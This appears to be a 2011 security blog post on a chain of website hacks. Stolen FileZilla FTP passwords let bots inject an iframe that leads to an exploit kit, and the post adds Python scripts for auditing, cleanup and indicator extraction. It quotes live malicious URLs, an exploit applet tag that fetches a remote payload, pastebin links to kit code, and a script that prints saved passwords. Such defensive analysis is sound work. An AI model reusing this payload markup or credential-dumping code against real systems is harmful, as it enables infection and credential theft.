
Automated attacks since 12/2010 using compromised credentials / chain reaction


Is your browser showing a content warning on legitimate websites? Do you get a virus warning while reading your favourite online newspaper? Here is why:

In October 2010 a “feature” was publicly pointed out: FileZilla silently stores saved credentials in plain text in an XML file (sitemanager.xml and recentservers.xml in its configuration directory). Credential-stealing malware had been exploiting this before it was widely known and has kept harvesting these files ever since. By now the collection of compromised records may number in the millions.
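As an added example (this is not code from the original post), here is a small Python audit that parses FileZilla 3's site manager file and lists every entry that carries a reusable password, which is exactly what the malware described above harvests. The XML is a constructed sample modelled on the 3.x sitemanager.xml layout (`<Host>`, `<User>`, `<Pass>`, `<Logontype>`); the handling of `<Pass encoding="base64">`, which newer FileZilla builds write, goes beyond the page and is an assumption about those builds. The second check reads the `Kiosk mode` setting of fzdefaults.xml (the setting name is taken from FileZilla's fzdefaults.xml.example and is likewise an assumption); with it set, FileZilla does not save passwords at all.

```python
"""Audit FileZilla 3 configuration files for passwords stored in the clear.

Added example, not the original post's code.
Real files: ~/.filezilla/sitemanager.xml and recentservers.xml (Linux/macOS),
%APPDATA%\FileZilla\ on Windows; fzdefaults.xml sits next to the binary.
"""
import base64
import sys
import xml.etree.ElementTree as ET

# Constructed sample modelled on the FileZilla 3.x sitemanager.xml layout
# (assumption: element names as in 3.x; irrelevant elements omitted).
SAMPLE_SITEMANAGER = """<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3>
  <Servers>
    <Server>
      <Host>ftp.example.com</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <User>webmaster</User>
      <Pass>s3cret-in-the-clear</Pass>
      <Logontype>1</Logontype>
      <Name>Production site</Name>
    </Server>
    <Server>
      <Host>ftp.staging.example.com</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <User>deploy</User>
      <Logontype>2</Logontype>
      <Name>Staging (asks for password)</Name>
    </Server>
    <Server>
      <Host>sftp.example.net</Host>
      <Port>22</Port>
      <Protocol>1</Protocol>
      <User>ops</User>
      <Pass encoding="base64">aHVudGVyMg==</Pass>
      <Logontype>1</Logontype>
      <Name>Newer build, base64-wrapped password</Name>
    </Server>
  </Servers>
</FileZilla3>
"""

# Constructed fzdefaults.xml with kiosk mode switched on.
SAMPLE_FZDEFAULTS = """<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3>
  <Settings>
    <Setting name="Kiosk mode">1</Setting>
  </Settings>
</FileZilla3>
"""


def _stored_password(server):
    """Return the password of a <Server> entry, or None if none is stored."""
    node = server.find("Pass")
    if node is None or not node.text:
        return None
    if node.get("encoding") == "base64":
        # Newer builds base64-wrap the value: that is encoding, not encryption.
        return base64.b64decode(node.text).decode("utf-8", "replace")
    return node.text


def saved_credentials(xml_text):
    """List (name, host, port, user, password) for every entry that carries a
    reusable password: Logontype 1 ("Normal") and a non-empty <Pass>."""
    root = ET.fromstring(xml_text)
    found = []
    for server in root.iter("Server"):
        if (server.findtext("Logontype") or "").strip() != "1":
            continue
        password = _stored_password(server)
        if password is None:
            continue
        found.append((
            server.findtext("Name", ""),
            server.findtext("Host", ""),
            server.findtext("Port", ""),
            server.findtext("User", ""),
            password,
        ))
    return found


def kiosk_mode_enabled(xml_text):
    """True if fzdefaults.xml sets "Kiosk mode" to a non-zero value."""
    root = ET.fromstring(xml_text)
    for setting in root.iter("Setting"):
        if setting.get("name") == "Kiosk mode":
            return (setting.text or "0").strip() != "0"
    return False


def report(sitemanager_xml, fzdefaults_xml=None):
    """Print a summary and return the number of exposed entries."""
    entries = saved_credentials(sitemanager_xml)
    for name, host, port, user, password in entries:
        print(f"[!] {name!r}: {user}@{host}:{port} password={password!r}")
    if fzdefaults_xml is not None and not kiosk_mode_enabled(fzdefaults_xml):
        print("[!] kiosk mode is off: FileZilla will keep saving passwords")
    return len(entries)


if __name__ == "__main__":
    # Pass real files on the command line; otherwise run on the constructed samples.
    if len(sys.argv) >= 2:
        sm = open(sys.argv[1], encoding="utf-8").read()
        fz = open(sys.argv[2], encoding="utf-8").read() if len(sys.argv) > 2 else None
    else:
        sm, fz = SAMPLE_SITEMANAGER, SAMPLE_FZDEFAULTS
    sys.exit(1 if report(sm, fz) else 0)
```

Run it against your own sitemanager.xml and recentservers.xml: every line it prints is a credential that any process running as your user (which is how the trojans below run) can read without privileges or decryption.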

Since December 2010 compromised websites have been turning up in numbers that point to an automated mass hack. For this attack it does not matter which OS, service or application (a CMS such as Joomla, or none at all) is installed; all that matters is that the stolen access password has not been changed. Every file can therefore be modified, including supposedly safe, non-active content such as plain HTML pages.

The attack uses whatever protocol the stolen credentials belong to, in this example FTP. The bot downloads every existing index.* file on the server and inserts a hidden iframe pointing to:

http://80.91.191.158/stats/priemIframe.php?hashftp=05f5b2944edd017d509cd3b92bfa7f69&hashpage=0d803ee4896cf18a80a781bb7e308ffd

The modified files are then uploaded again, together with a PHP shell and a blackhat-SEO framework.
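The injection just described can be detected and reversed mechanically. The following Python is an added example (not code from the post, and not the repair script mentioned in the comments): it matches any <iframe> whose src contains the priemIframe.php counter script, records the hashftp/hashpage values as indicators, strips the tag, and keeps a copy of each modified file as evidence. The infected index.html is a constructed sample; the tag's size and style attributes are assumptions, since the post quotes only the URL.

```python
"""Find and strip the injected priemIframe.php iframe from index.* files.

Added example, not the original post's code.
"""
import re
import sys
from pathlib import Path

# Any <iframe> whose src points at the counter script, with or without a
# closing tag. Matching on the script path instead of the full URL keeps the
# check independent of the per-site hashftp/hashpage values.
INJECTED_IFRAME = re.compile(
    r"<iframe\b[^>]*\bsrc\s*=\s*[\"']?[^\"'>]*priemIframe\.php[^>]*>\s*(?:</iframe\s*>)?",
    re.IGNORECASE,
)
HASH_PARAMS = re.compile(r"hash(ftp|page)=([0-9a-f]{32})", re.IGNORECASE)

# Constructed infected page; the iframe's size/style attributes are assumed.
SAMPLE_INDEX = (
    "<html><body>\n<h1>Welcome</h1>\n"
    '<iframe src="http://80.91.191.158/stats/priemIframe.php'
    '?hashftp=05f5b2944edd017d509cd3b92bfa7f69'
    '&hashpage=0d803ee4896cf18a80a781bb7e308ffd"'
    ' width="1" height="1" style="visibility:hidden"></iframe>\n'
    "</body></html>\n"
)


def extract_iocs(html):
    """Return one {'ftp': ..., 'page': ...} dict per injected iframe found."""
    return [dict(HASH_PARAMS.findall(m.group(0)))
            for m in INJECTED_IFRAME.finditer(html)]


def clean(html):
    """Return (cleaned_html, tags_removed)."""
    return INJECTED_IFRAME.subn("", html)


def clean_tree(root, pattern="index.*"):
    """Rewrite every matching file under `root` that carries the injection.

    The original is kept beside it as <name>.infected for later analysis.
    Returns [(path, tags_removed), ...] for the files that were changed.
    """
    changed = []
    # sorted() materialises the listing before any new file is written.
    for path in sorted(Path(root).rglob(pattern)):
        if not path.is_file() or path.suffix == ".infected":
            continue
        original = path.read_text(encoding="utf-8", errors="surrogateescape")
        cleaned, n = clean(original)
        if n:
            evidence = path.with_name(path.name + ".infected")
            evidence.write_text(original, encoding="utf-8", errors="surrogateescape")
            path.write_text(cleaned, encoding="utf-8", errors="surrogateescape")
            changed.append((str(path), n))
    return changed


if __name__ == "__main__":
    if len(sys.argv) > 1:
        for path, n in clean_tree(sys.argv[1]):
            print(f"cleaned {path}: {n} iframe(s) removed")
    else:
        import tempfile
        with tempfile.TemporaryDirectory() as tmp:
            Path(tmp, "index.html").write_text(SAMPLE_INDEX, encoding="utf-8")
            print("IOCs:", extract_iocs(SAMPLE_INDEX))
            print("changed:", clean_tree(tmp))
```

Cleaning the index files only removes the visible symptom; the PHP shell and the SEO directory the bot uploaded alongside them still have to be located in the FTP logs and removed, and the stolen password still has to be changed, or the bot simply comes back.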

This server, hosted in Ukraine, appears to be a counter and decision server. Depending on the visitor's OS and browser, the client is then redirected to a different server; here one in Austria:

http://oiewr4.at/gas/dnitezhpyokwhnhwglb2.php

Access is checked for a valid Referer header (you have to arrive from the counter server to get any content); on direct access the PHP page is empty. Which content you receive depends strongly on the browser, its version and the OS. (An up-to-date Firefox blocks the Austrian domain immediately, because it has already been reported.)

When that block is disabled or an older browser is used, and Java is enabled, you receive the following:

<applet mayscript='true' archive='jzdlgoazhzfvkli3.jar' code='a.class'><param name='trigger' value='isie'><param name='url' valuetype='ref' value='http:/178.162.229.52/gas/dseriwyubrjmkma.bin'></applet><body id='jpyvaq9' name='jpyvaq9'></body>

This Java applet uses two variants of the sound/MIDI exploit to infect the client (the IP address it fetches the payload from is located in India).
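To pull indicators out of such a landing page without running it, here is an added Python example (not code from the post or from the kit): it parses the applet markup with the standard-library HTMLParser and returns the jar, the entry class and the `url` parameter the applet fetches, then normalises the single-slash `http:/` that the quoted markup shows so the payload host can be extracted. The input is the applet tag above, re-quoted with straight quotes and embedded as a constructed sample.

```python
"""Extract indicators from an exploit-kit landing page's <applet> markup.

Added example; the sample below is the applet tag quoted in the post.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

SAMPLE_LANDING = (
    "<applet mayscript='true' archive='jzdlgoazhzfvkli3.jar' code='a.class'>"
    "<param name='trigger' value='isie'>"
    "<param name='url' valuetype='ref' value='http:/178.162.229.52/gas/dseriwyubrjmkma.bin'>"
    "</applet><body id='jpyvaq9' name='jpyvaq9'></body>"
)


class AppletParser(HTMLParser):
    """Collect every <applet> with its archive, code and <param> name/value pairs."""

    def __init__(self):
        super().__init__()
        self.applets = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)  # html.parser lower-cases attribute names
        if tag == "applet":
            self._current = {"archive": attrs.get("archive"),
                             "code": attrs.get("code"),
                             "params": {}}
            self.applets.append(self._current)
        elif tag == "param" and self._current is not None and attrs.get("name"):
            self._current["params"][attrs["name"]] = attrs.get("value") or ""

    def handle_endtag(self, tag):
        if tag == "applet":
            self._current = None


def extract_applets(html):
    parser = AppletParser()
    parser.feed(html)
    parser.close()
    return parser.applets


_SCHEME_FIX = re.compile(r"^(https?:)/+", re.IGNORECASE)


def normalise_url(url):
    """Repair 'http:/host/...' (one slash) to 'http://host/...' so urlsplit sees the host.
    Browsers and Java's URL class tolerate the sloppy form; analysis tooling often does not."""
    return _SCHEME_FIX.sub(lambda m: m.group(1).lower() + "//", url.strip())


def indicators(html):
    """Return a flat list of (kind, value) IOCs: jar names, class names, payload URLs and hosts."""
    iocs = []
    for applet in extract_applets(html):
        if applet["archive"]:
            iocs.append(("jar", applet["archive"]))
        if applet["code"]:
            iocs.append(("class", applet["code"]))
        for name, value in applet["params"].items():
            if name.lower() == "url" or value.lower().startswith("http"):
                url = normalise_url(value)
                iocs.append(("payload_url", url))
                host = urlsplit(url).hostname
                if host:
                    iocs.append(("host", host))
    return iocs


if __name__ == "__main__":
    for kind, value in indicators(SAMPLE_LANDING):
        print(f"{kind:12} {value}")
```

The jar name, the class name and the payload URL are exactly the three things to block or hunt for: the jar and class in proxy logs and the host in DNS and firewall logs, before the kit rotates them.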

Now see how “well” these two “old” Java exploits are detected by up-to-date antivirus scanners: only 4 out of 47 engines flag the malware:

http://www.virustotal.com/file-scan/report.html?id=d72d92174…

http://www.virustotal.com/file-scan/report.html?id=bad21728c…

Here is the link to the pastebin with the malicious code:

http://pastebin.com/TRWGyCfB

Here is the code deobfuscated:

http://pastebin.com/yHHnS64s

You can now easily see the exploited vulnerabilities.

This appears to be the Phoenix Exploit Kit.

The Phoenix Exploit Kit includes exploits for the following vulnerabilities:

Flash exploits

Adobe Flash Integer Overflow in AVM2 – CVE-2009-1869
Adobe Flash Integer Overflow in Flash Player – CVE-2007-0071

PDF exploits

Adobe Reader CollectEmailInfo Vulnerability – CVE-2007-5659
Adobe Reader Collab GetIcon Vulnerability – CVE-2009-0927
Adobe Reader LibTiff Vulnerability – CVE-2010-0188
Adobe Reader newPlayer Vulnerability – CVE-2009-4324
Adobe Reader util.printf Vulnerability – CVE-2008-2992

Internet Explorer exploits

IE MDAC Vulnerability – CVE-2006-0003
IE SnapShot Viewer ActiveX Vulnerability – CVE-2008-2463
IE iepeers Vulnerability – CVE-2010-0806

Java exploits

Java HsbParser.getSoundBank Vulnerability – CVE-2009-3867
Java Development Kit Vulnerability – CVE-2008-5353

I was too slow in decrypting the script to be able to download the files, as the servers had been shut down in the meantime (within half a day).

These exploits will then try to drop one or more trojans. The trojans search the compromised user account for saved passwords and may also hook into the browser to capture credentials directly. Everything they find is submitted to a server and used to compromise the next server, and so on: that is the chain reaction.

As you can see, even a good virus scanner may let the trojan run. So don't feel safe.

  1. Don’t use FileZilla (or at least don’t let it save passwords)
  2. Never save credentials in the browser
  3. Don’t use Internet Explorer
  4. Keep your OS, browser and third-party software (Adobe Flash, Java, ..) up to date
  5. Periodically change your passwords
  6. Use security browser plugins like Adblock Plus and NoScript
  1. Kai-AchimBruder
    2011/01/22 at 2:03 am

    Hello

    and many thanks for this article. Now I know why 20 of my websites are off.

    I’m/was using FileZilla and I have this in all my index.php/html:

    hxxp://80.91.191.158/stats/priemIframe.php?part=2&hashftp=###&hashpage=###

    Is there any way to clean all the index.php/html of the hacked websites?

    Greetings Kai

    • 2011/01/22 at 10:24 am

      Hi Kai,

      First, change all your passwords. If you really want to continue using FileZilla, disable password saving; you have to change the “Kiosk Mode” setting in fzdefaults.xml to do so.
      Best would be to flush all the contents of your web servers and upload an uncompromised backup.

      Otherwise, delete the lines from your index files, check the FTP logs on your servers for which files have been uploaded and delete them all (it should be a PHP shell and a folder containing blackhat-SEO stuff).

      I will drop you an email if you need more support.

      Best Regards,

      Andre

  2. 2011/01/24 at 3:31 pm

    I wrote a little PHP script that can be run from the console or the web to repair the infected files:

    Edit: (Script moved to article https://integer13.wordpress.com/2011/01/24/update-on-priemiframe-hacks/, Thanks for the submission)

